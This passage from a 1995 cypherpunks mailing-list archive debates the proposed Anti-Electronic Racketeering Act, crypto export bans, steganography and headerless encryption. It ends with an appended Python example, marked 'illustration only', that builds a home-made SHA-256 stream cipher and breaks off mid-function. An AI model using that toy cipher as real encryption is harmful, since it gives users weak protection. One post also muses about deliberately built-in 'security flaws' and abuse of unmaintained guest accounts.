> >       software has been designated nonexportable."
> >
> So much for compression software, too. :-(
> Pst! Anyone want a copy of gzip? PKZip? Drop*Stuff?

Those of you who have done complexity theory will take issue with the 
word 'encode'--the fact that it is binary is an encoding scheme--a simple 
one, but an encoding scheme in a language L2 nonetheless.

Ben.
____
Ben Samman..............................................samman@cs.yale.edu
I have learned silence from the talkative, toleration from the intolerant,
and kindness from the unkind; yet, strange, I am ungrateful to those 
teachers.-- K. Gibran. SUPPORT THE PHIL ZIMMERMANN LEGAL DEFENSE FUND!
For information Email: zldf@clark.net       http://www.netresponse.com/zldf  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Thu, 13 Jul 95 11:46:21 PDT
To: cypherpunks@toad.com
Subject: The end of public key cryptography as we know it?
Message-ID: <199507131846.NAA06768@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain



An article posted on sci.crypt stated that quantum factoring
is real and that an article was posted in this month's Science
magazine. The author of the post says this would make factoring
a 10 bit number the same time as factoring a 100000000 bit number.

I wonder how long it is before every major government in the world
has one of these. Makes RSA's future kind of moot doesn't it??

I definitely have to read this article, but I thought I'd post it
here for those that weren't aware or that hadn't heard.

I wonder how long it will take before they can figure out how to
do this for other computationally intensive problems like N-th roots.
(To make Diffie Hellman moot as well).

It's beginning to seem that mathematically challenging algorithms
aren't going to be that challenging for long.  I have no details other
than what is posted here.

Perhaps somebody could post a better synopsis than what was in
sci.crypt? (I plan on reading it for myself anyway, which I imagine
most other people here will be doing as soon as they can)

 Doug Hughes				Engineering Network Services
 doug@eng.auburn.edu			Auburn University



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 13 Jul 95 10:58:09 PDT
To: cypherpunks@toad.com
Subject: VENONA web page
Message-ID: <199507131756.NAA18398@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by jim@acm.org (Jim Gillogly) on Thu, 13 Jul 
10:18 AM

>
>Check out http://www.fas.org/pub/gen/fas/irp/venona/



Amazing IC links from this stepstone. Ebony NRO with a nascent 
homepage!


Must be budget-cut-itis.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: perry@imsi.com (Perry E. Metzger)
Date: Thu, 13 Jul 95 11:00:08 PDT
To: cypherpunks@toad.com
Subject: mistake on my part
Message-ID: <9507131759.AA12314@webster.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain


I made a small mistake -- the new bill does *not* make it a crime to
make crypto software available at Egghead -- but it does more or less
make distribution of crypto software over the internet impossible if
it isn't an escrow based system.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 13 Jul 95 14:02:33 PDT
To: cypherpunks@toad.com
Subject: speeding detected by civilians
Message-ID: <199507132101.OAA27319@netcom12.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


hate to start another endless thread on speeding limits, but
this is an interesting privacy anecdote... hope this hasn't
been posted here.


===

From: "Steven M. Horvath" <horvath@comm.mot.com>
Subject: Speeder's Beware of Vernon Hills, IL.
To: snet-l <snet-l@world.std.com>

- - -------- FYI------------------FYI--------------------FYI-----------------

Vernon Hills, IL.

Vernon Hills, Illinois, a Chicago suburb, has passed legislation allowing 
citizens to check out radar guns from the local police department to 
catch speeders in their community. The radar guns are combined with 
cameras in order to instantaneously capture the car, license number, and the 
rate of speed. The citizens can check out the units for a week at a time. The 
police have stated that they, at this time, will use the data to issue 
warning letters to the violators.






- ------- End of Forwarded Message


------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 13 Jul 95 11:08:16 PDT
To: koontz@MasPar.COM
Subject: Re: Anti-Electronic Racketeering Act of 1995
In-Reply-To: <9507131806.AA01162@homeboy.local>
Message-ID: <9507131807.AA12711@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



koontz@MasPar.COM writes:
> >Depends on how "computer network" is defined in the statute.
> 
> It's added language.  "computer network" is not defined.  Catcha' 22.

I just read the bill -- it has no definitions of anything. Very
disturbing.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Thu, 13 Jul 95 12:10:27 PDT
To: "Timothy C. May" <tcmay@sensemedia.net>
Subject: Re: Crisis Overload (re Electronic Racketeering)
In-Reply-To: <ac2aab2c0b021004b5fe@[205.199.118.202]>
Message-ID: <Pine.ULT.3.91.950713140141.8587C-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jul 1995, Timothy C. May wrote:

> I think it's time to abandon all lobbying efforts...they don't appear to be
> working, and the government is proliferating new laws faster than we can
> fight them.
> 
> The only hope is to more rapidly deploy crypto, to reach the "point of no
> return." Optimistically, we may already be there (the views expressed by
> many of us). Pessimistically, the application of RICO laws and civil
> forfeiture could put any of us who advocate crypto use and evasion of the
> new laws into a precarious position.

Unfortunately, a system of social engineering needs to be adopted to get 
massive use of cryptography started.  This means, and I advocated this 
from the day I entered this forum, that programs such as PGP need to be 
redesigned so that they are user friendly . . . so user friendly that any 
Joe Moron can figure out not only how to use them, but also how it helps 
them and how it is "good" for them.  This means that we need simplified 
key management easy enough for the point-and-click masses to utilize.  
This means that common mailing programs, from Elm and Pine to AOL's and 
Computer$erve's mailers need to have TRANSPARENT signing of mail messages 
and near-transparent encryption of messages.  This means that we need to 
stop lobbying the government (they don't listen) and start lobbying Big 
Business, like IBM, MicroSoft, Apple, etc, to start including encryption 
hooks in their software.  And if PGP is a problem, International PGP 
might be an option.  And if there are problems with patent infringements 
and that kind of crap, then we (the concerned people of the global 
network) need to develop a free encryption scheme that can do everything 
PGP can do and still be legal.

Unfortunately, all I can do is stand on the sidelines and cheer, because I 
am not a programmer; I'm a user and a teacher.

We've seen the enemy, and they are the 535 senators and representatives 
in D.C., and the staff in the White House.  It's time to shore up our 
allies and enter the battle with the best weapons we have; information 
and popular use.

> In fact, it's what many of us saw implicit in Clipper.

Yup.  We all saw it with clipper.  We were all called paranoid.

Guess so...

____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 13 Jul 95 11:11:57 PDT
To: extropians@panix.com
Subject: New Country Conference
Message-ID: <199507131811.OAA06672@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


I should have mentioned this before but:

New Country Conference

This Saturday July 15th

The New Country Foundation's first annual conference.

Gramercy Park Hotel (Lexington Avenue & 21st Street)
New York City

9:30am

Admission is $35.00 at the door

Speakers:

Mike Oliver, author of "A New Constitution for a New Country."

Richard Morris, President of Sea Structures, Inc. -- Developer of the Seacell floating platform technology.

and a number of others.

Info from Marc Joffe at 71045.142@compuserve.com.

I will be there representing the "New Country in Cyberspace" heresy.

DCF

"Don't waste your time and money forming a new country in the physical realm.   Bits are cheaper than atoms and encrypted bits are stronger than the strongest atoms."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Thu, 13 Jul 95 12:34:28 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: mistake on my part
In-Reply-To: <22250.9507131850@exe.dcs.exeter.ac.uk>
Message-ID: <Pine.ULT.3.91.950713143343.10146B-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jul 1995 aba@dcs.exeter.ac.uk wrote:

> If they pull this off stage 2, I wonder how long till stage 3, I think
> it'll be time to leave the sinking ship while exit visas are still
> granted!

And go where?  I know I'm living in a shell, but I've never heard a 
definitive answer of where is a better place to live and still has the 
same or better freedoms.

*serious question*

____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Gillman <syshtg@gsusgi2.Gsu.EDU>
Date: Thu, 13 Jul 95 11:39:36 PDT
To: cypherpunks@toad.com
Subject: Grassley's Anti-Ridiculous Act
Message-ID: <199507131839.OAA03488@gsusgi2.Gsu.EDU>
MIME-Version: 1.0
Content-Type: text/plain



OK...let's see...

"shall be unlawful for any person to damage or threaten to
damage electronically or digitally stored data..."

Does that mean I can't erase my floppies anymore? :)
Or, is it that I can't say, "I'm gonna format you!" and then not do it?

Scratching your CDs would be illegal.

When you get down to it, your brain is an electrochemical computer.
You're no longer allowed to forget anything, either.
"But storage in your brain is not digital!", you say..

Electronically _or_ digitally stored.

Swapfiles are right out.

Writeable memory is out in general.

"unlawful to distribute unlicensed software..."

There goes shareware. Freeware's still okay, I guess.
Do many people treat shareware as anything more than freeware?

The Steve Jackson clause at the end about work materials is
cute, but the law doesn't seem to require giving the data back.

And the clause about being able to enter evidence obtained
electronically via 3rd party is interesting. Means an
administrator can legally store email and turn it over...


This bill is so monumentally stupid I can't believe it.

Tom

-- 
 Tom Gillman, Unix/AIX Systems Weenie  |"For a privacy advocate to determine
 Wells Computer Center-Ga. State Univ. |the best way to do key escrow is like
 (404) 651-4503 syshtg@gsusgi2.gsu.edu |a death penalty opponent choosing
 I'm not allowed to have an opinion.   |between gas or electricity"-D.Banisar
                                    
  key to UNIX: echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sbA0D4D465452snlbxq'|dc



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jason Burrell <jburrell@crl.com>
Date: Thu, 13 Jul 95 12:50:11 PDT
To: Brad Dolan <bdolan@use.usit.net>
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <Pine.SOL.3.91.950712171632.1850A-100000@use.usit.net>
Message-ID: <Pine.LNX.3.91.950713142925.110D-100000@crl.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 12 Jul 1995, Brad Dolan wrote:

> ---------- Forwarded message ----------
> Date: Wed, 12 Jul 1995 15:28:25 -0400
> Subject: Anti-Electronic Racketeering Act of 1995
> 
> 
> On June 27, Sen. Grassley introduced extensive criminal amendments to the
> federal racketeering act.  S. 974, the "Anti-Electronic Racketeering Act of
> 1995," would amend U.S. Code sections 18 USC 1961 (criminal RICO statute),
> 18 USC 1030A (new section on computer crime), 18 USC 2515, 2516
> (wiretapping), and 42 USC 2000aa (Privacy Protection Act).
> 
> This proposed legislation is Very Bad. It would make all encryption
> software posted to computer networks that are accessible to foreigners
> illegal *regardless of whether the NSA has classified the software as a
> munition!!!*  Here's the language:
> 
>  "Sec. 1030A.  Racketeering-related crimes involving computers
>    "(a) It shall be unlawful--
> 
> . . .
> 
>       "(2) to distribute computer software that encodes or encrypts
>     electronic or digital communications to computer networks that the
>     person distributing knows, or reasonably should know, is accessible to
>     foreign nationals and foreign governments, regardless of whether such
>     software has been designated nonexportable."

en-code (inkoud) pres. part. en-cod-ing past and past part. en-cod-ed to put
into code

code (koud) 1. n. a collection of statutes, rules, etc. methodically arranged
|| an accepted way of signals, Morse code || a system in which arbitrary
values are given to letters, words, numbers or symbols to ensure secrecy or
brevity (cf. CIPHER) 2. v.t. pres. part. cod-ing past and past part. cod-ed
to put (a message) into code || (genetics) to particularize the genetic code
used in synthesizing [F.]

(Source: New Webster's Dictionary and Thesaurus of the English Language,
1993)

Assuming that this isn't contradicted by other parts of the legislation,
doesn't this outlaw distribution "to computer networks" software for
everything from compression to data structures to TCP/IP to ROT13 to PGP? 

The bad part is that they might "compromise" and, by the time it's over 
with, it still outlaws non-GAK crypto. At least when it's overly broad it 
has a better chance of getting laughed out of court.

The United States Government *is* this stupid. If you are unfortunate 
enough to live within U.S. borders, welcome to hell. *heavy sigh*

--
PGP public key available via finger.	      
GCS/AT d H- s-: g+ p2+ au+ !a w++ v++(--)>! C++++ UL+++>++++ P++ 
L++>+++ 3- E- N+++ K W--(---) M- V-- po--- Y++ t 5+++ j R+++ G 
tv+ b+>++ D B-- e- u*(**) h* f(+) r(-)@ n--->+++ x? 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Thu, 13 Jul 95 11:55:51 PDT
To: perry@imsi.com
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <9507131535.AA12389@snark.imsi.com>
Message-ID: <9507131855.AA04443@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Perry writes:
> This law would also criminalize selling crypto software -- even
> emasculated crypto software -- at Egghead, by the way. Remember, even
> *if the crypto software is exportable* it's a crime. It also would
> criminalize the distribution of ROT-13. I'm not making either of these
> things up.

Draconian as it is, you seem to be overlooking some of the (ever so faintly)
mitigating clauses of this Grass-t-ley bill. Pre-arranged GAK is an admissible
excuse for dodging the crypto ban, so ROT-13 could still be distributed.

Why do you think Egghead couldn't sell crypto any more ?  It's not a computer
network by any definition I've heard so far.... 

-Futplex <futplex@pseudonym.com>
GAK: it's not just a bad idea, it may soon be the law !



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 13 Jul 95 14:57:46 PDT
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: Crisis Overload (re Electronic Racketeering)
In-Reply-To: <9507131924.AA12834@snark.imsi.com>
Message-ID: <Pine.SUN.3.91.950713143406.17575A-100000@crl8.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Thu, 13 Jul 1995, Perry E. Metzger wrote:

> As unpleasant as the congress is, it isn't the enemy. The governmental
> forces desiring control are not the same as the congress.

I'm not so sure.  Both politicos and bureaucrats go into their
respective lines of work for many reasons.  One of the main 
reasons--in my opinion--is a lust to control others.  Being the 
"others," we should resist this tendency.  This begins with the
realization that most of them *are* the enemy and acting 
accordingly.

> This is not to say that we shouldn't be widely deploying crypto -- we
> should. (Of course, offshore sites will always have crypto available,
> but...) 

Yes, what we really need is easy, drop-in, point-and-click PGP
for the computer neophytes.  And we need to give it away to
all of them.  I wish I knew how to accomplish all that.

My "wish list" also includes a fantasy in which someone 
(hopefully, a Cypherpunk) cracks some NSA developed, secret
algorithm, crypto system, preferably causing some sycophantic
company or organization to lose a bundle.  Ah, dreams.


 S a n d y

P.S.  My 84 year old mother went in to buy a refrigerator 
      from Sears or Monkey Wards or whomever.  She picked 
      out a top-of-the-line Tappan.  However, when she was 
      getting ready to pay, the salesperson began to ask
      her a series of questions which included her age and
      social security number.  My mom said, "Just stop
      right there.  If you want to ask all this personal 
      information, I'll just buy it somewhere else."  They
      stopped asking questions and took her check.  

      I think Nancy Reagan had a good idea there.  Just 
      say `NO'.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin Stumborg <tbird@eagle.wbm.ca>
Date: Thu, 13 Jul 95 14:00:06 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199507132100.PAA14248@eagle.wbm.ca>
MIME-Version: 1.0
Content-Type: text/plain


send me mail





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 13 Jul 95 11:57:52 PDT
To: cypherpunks@toad.com
Subject: Timothy C. May: Re: Crisis Overload (re Electronic Racketeering)
Message-ID: <9507131857.AA12796@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Well, I guess I've been plonked by no less than Tim.

Time will tell which of us is correct.

------- Forwarded Message

To: perry@imsi.com
From: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: Crisis Overload (re Electronic Racketeering)

At 6:30 PM 7/13/95, Perry E. Metzger wrote:

>Tim, I respect your opinions a lot, but I don't think you know squat
                                         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>about this topic. You don't understand how Washington works. I believe
>I have a better grasp on this than you do. It's hard, but not even
>remotely impossible, to derail this crap. We should make every
>possible effort to do so. The defeatism you are emitting is silly.
                               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Perry,

I have all I'm going to take of your acerbic rudeness to me.

I will no longer be responding to any of your messages.

- --Tim

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."



------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 13 Jul 95 15:06:49 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: speeding detected by civilians
In-Reply-To: <199507132101.OAA27319@netcom12.netcom.com>
Message-ID: <Pine.SUN.3.91.950713150252.17575B-100000@crl8.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Thu, 13 Jul 1995, Vladimir Z. Nuri wrote:

> Vernon Hills, Illinois, a Chicago suburb, has passed legislation allowing 
> citizens to check out radar guns from the local police department to 
> catch speeders in their community. The radar guns are combined with 
> cameras in order to instantaneously capture the car, license number, and the 
> rate of speed. The citizens can check out the units for a week at a time. The 
> police have stated that they, at this time, will use the data to issue 
> warning letters to the violators.

Great!  I'll take a hundred, please.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Thu, 13 Jul 95 13:14:00 PDT
To: Doug.Hughes@eng.auburn.edu
Subject: The end of public key cryptography as we know it?
In-Reply-To: <199507131846.NAA06768@netman.eng.auburn.edu>
Message-ID: <199507132009.AA15283@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Doug Hughes <Doug.Hughes@eng.auburn.edu>
   Date: Thu, 13 Jul 1995 13:46:10 -0500

   An article posted on sci.crypt stated that quantum factoring
   is real and that an article was posted in this month's Science
   magazine. The author of the post says this would make factoring
   a 10 bit number the same time as factoring a 100000000 bit number.

You can bet your ass and your mother's and grandmother's donatable
organs that if this were possible, then the legislative initiatives
currently underway would not be: they'd just let us use RSA and get
a false sense of security.

   I wonder how long it is before every major government in the world
   has one of these. Makes RSA's future kind of moot doesn't it??

Well, it would probably "prove" many-worlds right: in which case
we're probably going to be invaded from the one where the Nazis
won WWII, or the libertarians won Shays' Rebellion.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Thu, 13 Jul 95 12:17:24 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: def'n of "computer network"
Message-ID: <Pine.SUN.3.91.950713150101.20411A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


Bet you 10-1 that "Computer Network" as implemented in the new bill will 
refer to any computing system that could possibly defend /itself/ through 
common carrier status.  IE including small non-networked fringe BBSs that 
attempt to claim "common carrier" status.

And many networks that don't claim common carrier status, too.

The real solution to the crypto-legalization problem is anonymity.  
Seeing as I've not checked the bill out yet, nor am I a lawyer, I can't 
say what the implications for that are.  If there are anti-remailer 
implications, the solution may be to build tools with "security flaws" 
(ie remailing capability).  I know that this has been discussed before, 
but this is the time to implement it.  Obviously, the information about 
the "security holes" will have to be spread widely, but the flaws will 
have to be built so deep in the design as to not be removable.

In addition, now is the time to deploy stego, on a massive scale.  How 
many stego programs have been released for Unix?  Can these be integrated 
with mailing programs in the same way that PGP has been?

What would be the legal liability of the maintainer of a common-carrier 
status system that had a guest account which had been (or based on the 
current legislation) could be used for anonymity/crypto stuff?  If he's 
liable, does this mean that system administrators are liable for any 
potential security hole in their system that a random evil internet 
hacker uses to abuse another system?  Hmmm... Usenet 
alt.binaries.pictures.barney + stego software + unmaintained 'guest' 
account on a random system = ???

Any lawyers?
Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410) 494-3253 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 13 Jul 95 12:25:11 PDT
To: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Subject: Re: Crisis Overload (re Electronic Racketeering)
In-Reply-To: <Pine.ULT.3.91.950713140141.8587C-100000@krypton.mankato.msus.edu>
Message-ID: <9507131924.AA12834@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



"Robert A. Hayden" writes:
> We've seen the enemy, and they are the 535 senators and representatives 
> in D.C., and the staff in the White House.  It's time to shore up our 
> allies and enter the battle with the best weapons we have; information 
> and popular use.

As unpleasant as the congress is, it isn't the enemy. The governmental
forces desiring control are not the same as the congress.

Congressmen are by and large harried and ignorant people. They have no
idea what any of this is about. We have the choice of letting Louis
Freeh do all the educating, or having a white shoe Washington PR firm
do some of the educating, too. I favor the latter approach.

This is not to say that we shouldn't be widely deploying crypto -- we
should. (Of course, offshore sites will always have crypto available,
but...) 

This is also not to say that Congress doesn't pass very bad laws.

However, I very, very strongly urge that we not assume that nothing
can be done. Just winning a couple years time could totally alter the
landscape.

Perry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 13 Jul 95 12:27:49 PDT
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Re: def'n of "computer network"
In-Reply-To: <Pine.SUN.3.91.950713150101.20411A-100000@rwd.goucher.edu>
Message-ID: <9507131927.AA12842@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Jon Lasser writes:
> In addition, now is the time to deploy stego, on a massive scale.

I've said it before, and I'll say it again.

My opinion is that steganography "standards" are useless. Anyone can
try unpeeling the GIFs and see if something interesting shows up
inside. That means that the only useful stego suffers from the defect
that symmetric key cryptography suffers from -- you have to have made
serious pre-arrangements with the counterparty.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Thu, 13 Jul 95 12:34:50 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995
Message-ID: <199507131932.PAA01245@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Weld Pond <weld@l0pht.com> responding to

Duncan Frissell <frissell@panix.com> 

<good discussion snipped>

wrote:


>That raises an interesting issue. 

<good discussion snipped>

>Will they have to invent a huge new bureaucracy
>to manage all these devices and programs? 

Talk about a self-answering question...How else could it be done?

>There are many problems with this idea of 
>Government Access to Devices or Programs (GADOP).  

I can think of only one problem with the idea,
it's called the Bill of Rights.
[If there is anything left of it after this session of Congress.]

>A toolset that could build many different encryption 
>and decryption variations based on pseudo-random input
>may be a good tool to fight this nonsense.

Agreed. As well as steganographic software of many kinds
to hide this terrible "crime" we all love to commit, for
the peace loving among us...

BUT [and I hope this doesn't happen.]
I fear that the anarchy resulting from this kind of statist
idiocy will lead many (otherwise peaceful) folks to think that the
only good tool to fight this nonsense is a good shotgun. 
Of course, then we can simply outlaw those, too. 

<good discussion snipped>
Regards,
Jim Ray


- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

- -----END PGP SIGNATURE-----

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Thu, 13 Jul 95 12:37:18 PDT
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: def'n of "computer network"
In-Reply-To: <9507131927.AA12842@snark.imsi.com>
Message-ID: <Pine.SUN.3.91.950713152622.22564A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jul 1995, Perry E. Metzger wrote:

> Jon Lasser writes:
> > In addition, now is the time to deploy stego, on a massive scale.
> 
> I've said it before, and I'll say it again.
> 
> My opinion is that steganography "standards" are useless. Anyone can
> try unpeeling the GIFs and see if something interesting shows up
> inside. That means that the only useful stego suffers from the defect
> that symmetric key cryptography suffers from -- you have to have made
> serious pre-arrangements with the counterparty.

True, in that sense it's useless.  But if it's PGP'd with a sufficient 
key, nobody can read it.  If it's from a well-overused guest account, 
nobody can find who sent it.  If the picture's not preceded with an 
identification of the intended recipient, and is posted in a public 
forum, then nobody knows who it's for.  Especially if everyone has to 
read it in order to find out if it's for them.

If PGP 3.0 has some sort of option to decrypt messages without PGP 
headers or footers, then the issue ceases to be relevant. Because you've 
stego'd already random-seeming material.  If the stego program is 
integrated with PGP properly, you have public key steganography.

It's possible; just that somebody's gotta write the damned software.  And 
I'm certainly not capable to do that.  Yet.

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410) 494-3253 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 13 Jul 95 12:46:51 PDT
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Re: def'n of "computer network"
In-Reply-To: <Pine.SUN.3.91.950713152622.22564A-100000@rwd.goucher.edu>
Message-ID: <9507131946.AA12904@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Although I hardly oppose the construction of "headerless"
cryptographic protocols, they make key management in any sort of a
reasonable system a living hell. If you work for an organization
maintaining a reasonable number of keys -- say a few hundred at some
institution -- you will have to linearly search them to find which one
is the right one. What a royal pain.

Rapid deployment in ordinary software is, of course, preferable.

Perry
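
The key-lookup cost described in the message above, as an added example that is not part of the original post: with a key-ID header the receiver does one lookup, while a headerless message forces trial decryption against every key held. A toy encrypt-then-MAC scheme built from the Python standard library stands in for PGP's public-key packets (an assumption so the block runs stand-alone); the 300-key keyring, the recipient index and all function names are constructed.

```python
import hashlib
import hmac
import os

NONCE_LEN, TAG_LEN, KEYID_LEN = 16, 32, 8


def _subkey(key: bytes, label: bytes) -> bytes:
    """Derive separate encryption and MAC keys from one long-term key."""
    return hashlib.sha256(label + key).digest()


def _xor_stream(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """SHA-256 in counter mode as a toy stream cipher (illustration only)."""
    stream = bytearray()
    counter = 0
    while len(stream) < len(data):
        stream += hashlib.sha256(key + nonce + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(a ^ b for a, b in zip(data, stream))


def key_id(key: bytes) -> bytes:
    """Short public identifier for a key, the kind of field a header carries."""
    return hashlib.sha256(b"id" + key).digest()[:KEYID_LEN]


def seal(key: bytes, plaintext: bytes, with_header: bool) -> bytes:
    """Encrypt-then-MAC. Headerless output is nonce || body || tag, all random-looking."""
    nonce = os.urandom(NONCE_LEN)
    body = _xor_stream(_subkey(key, b"enc"), nonce, plaintext)
    tag = hmac.new(_subkey(key, b"mac"), nonce + body, hashlib.sha256).digest()
    blob = nonce + body + tag
    return key_id(key) + blob if with_header else blob


def try_open(key: bytes, blob: bytes):
    """Return the plaintext if the tag verifies under this key, else None."""
    if len(blob) < NONCE_LEN + TAG_LEN:
        return None
    nonce, body, tag = blob[:NONCE_LEN], blob[NONCE_LEN:-TAG_LEN], blob[-TAG_LEN:]
    expected = hmac.new(_subkey(key, b"mac"), nonce + body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None
    return _xor_stream(_subkey(key, b"enc"), nonce, body)


def open_with_header(keyring: dict, message: bytes):
    """One dictionary lookup on the key ID, then at most one decryption."""
    key = keyring.get(message[:KEYID_LEN])
    if key is None:
        return None, 0
    return try_open(key, message[KEYID_LEN:]), 1


def open_headerless(keys: list, message: bytes):
    """No hint which key applies: try each in turn until a tag verifies."""
    for trials, key in enumerate(keys, start=1):
        plaintext = try_open(key, message)
        if plaintext is not None:
            return plaintext, trials
    return None, len(keys)


def make_keys(count: int = 300) -> list:
    """Constructed keyring: 'a few hundred' keys held by one institution."""
    return [hashlib.sha256(b"constructed-key-%d" % i).digest() for i in range(count)]


def demo() -> dict:
    keys = make_keys()
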